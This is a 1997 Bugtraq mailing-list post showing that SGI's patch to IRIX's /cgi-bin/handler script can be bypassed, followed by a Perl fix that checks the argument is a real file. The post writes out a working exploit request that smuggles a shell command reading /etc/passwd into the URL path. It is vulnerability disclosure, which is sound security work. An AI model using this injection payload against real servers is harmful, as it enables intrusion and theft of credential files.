Bugtraq mailing list archives
/cgi-bin/handler - more notes
From: drazvan () kappa ro (Razvan Dragomirescu)
Date: Thu, 19 Jun 1997 23:06:13 +0300
Hi, I have had reports that my exploit for SGI's /cgi-bin/handler does not work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX 6.3 and they tried to fix it, but they actually DID NOT. They added a new line to the script: $doc=~s/\|*$// (in plain English, this means "remove any number of '|'s at end-of-string"). But guess what. It works just as fine if you put another TAB character after the "pipe" (so that the "pipe" is not at end-of-string, the TAB is). The exploit should read telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0 It tricks the script into executing the command anyway. Now, for those of you who want to patch it somehow, here's the best solution that has been posted to me (all credits for it go to Wolfram Schneider <wosch () apfel de>) All "open" commands should check if the their argument is really a filename. You could use: -f $doc && open (INPUT, $doc) (Same thing as: if (-f $doc) {open (INPUT, $doc) } , the one written above is more PERL style) I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed out the problem on IRIX 6.3). So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable. Anyone on IRIX 6.4? :) (What does it run on BTW?) Be good. Razvan ------------------------------------------------------------------------------- RazvanDragomirescu Organization: KappaNet E-Mail: drazvan () kappa ro, drazvan () romania ro Alternate E-mail: drazvan () iname com, drazvan () guv ro, drazvan () pub ro, drazvan () lbi ro Phone: +40-1-6866621 NIC-HANDLE: RD1604 RIPE-HANDLE: RD38-RIPE NO CARRIER "Smile, tomorrow will be worse" (Murphy) -------------------------------------------------------------------------------
Current thread:
- Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
- Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
- http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
- Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)
- Re: Core file anomalies under BSDi 3.0 Stacey Son (Jun 20)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- /cgi-bin/handler - more notes Razvan Dragomirescu (Jun 19)
- Re: Solaris 2.5.1 party piece Doug Hughes (Jun 19)
- Re: Solaris 2.5.1 party piece Bojan Zdrnja (Jun 20)
- Re: Solaris 2.5.1 party piece Joe Gross (Jun 20)
- <Possible follow-ups>
- Re: Netscape Admin Servers /tmp/deamonstat Corinne Posse (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Valdis.Kletnieks () VT EDU (Jun 18)
- Re: your mail J. Joseph Max Katz (Jun 18)
- Re: your mail yeti (Jun 19)
- WE FOUND IT! (fwd) Jason R Mastaler (Jun 18)
- Re: Netscape Admin Servers /tmp/deamonstat Valdis.Kletnieks () VT EDU (Jun 18)